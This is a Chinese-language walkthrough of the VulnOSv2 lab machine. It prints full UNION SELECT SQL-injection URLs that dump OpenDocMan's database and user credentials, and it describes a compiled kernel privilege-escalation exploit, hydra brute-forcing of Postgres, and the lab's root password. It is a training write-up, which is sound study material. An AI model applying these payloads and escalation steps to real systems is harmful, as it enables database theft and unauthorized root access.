VulnOSv2详细教学

“别走远了”

——以上内容由DeepSeek R1模型输出

arp发现靶机ip地址发现开放80端口那先去访问一下问题不大，没有什么有用的提示那就上dirb跑一下这里给了一个版本号通过searchsploit搜索了一下没有这个版本的poc/exp去网上搜搜看这个也试了一下也利用不了回到页面上发现有个website可以点然后我们会来到一个新的网站最终在每个页面都看了一下，发现这个页面的鼠标放上去鼠标会变，这里也是给了账号密码通过提示我们用给的用户名和密码去访问一下来到这个地方我们发现一个大大的logo就是这个opendocman，还是老样子去searchsploit搜索一下刚好有一个符合的拿到当前目录下好好看看这个意思是有两个漏洞可以用一个sql注入一个权限提升的

尝试利用http://192.168.52.151/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version(),3,4,5,6,7,8,9

爆破库名192.168.52.151/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user  UNION SELECT 1,group_concat(schema_name),3,4,5,6,7,8,9 from information_schema.schemata

爆表http://192.168.52.151/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,group_concat(table_name),3,4,5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema=database()

字段192.168.52.151/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema=database()

查表http://192.168.52.151/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,group_concat(column_name),3,4,5,6,7,8,9%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=0x6f646d5f75736572佬说这里有一个注意点，就是用字符串表名来查表的时候查不出来，需要把表的字符串换成16进制0x6f646d5f75736572

查密码http://192.168.52.151/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,group_concat(username,password),3,4,5,6,7,8,9 from odm_user

给了两个密码咱们都试试ssh直接连进来先用python获取一个交互式shell,可以看到内核是一个低版本的去search一下有两个符合先试试.c将.c文件wget到tmp目录下，看看.c怎么执行的，编译后./ofs执行提权脚本，成功获取权限

第二种方式 解压目录下的文件夹,hydra./confingure好了之后告诉我们make安装成功ps -aux时发现postgres进行信息，还有hydra尝试进行一下爆破来到usr/share/wordlists/metasploit目录下面有postgres的默认密码和用户的密码本这样结合hydra爆破一下./hydra -L user.txt -P passwd.txt localhost postgres登录postgres psql -h localhost -U postgres查看databasec 进入到这个systemSLECT * FROM users;su切换到vulnosadmin 查看有一个r00t.blend 通过cp挂在html目录下wget下载r00t.blend来到这个https://imagetostl.com/cn/view-blend-online网站下点击上传就可以看到，然后用密码登录root即可ab12fg//drg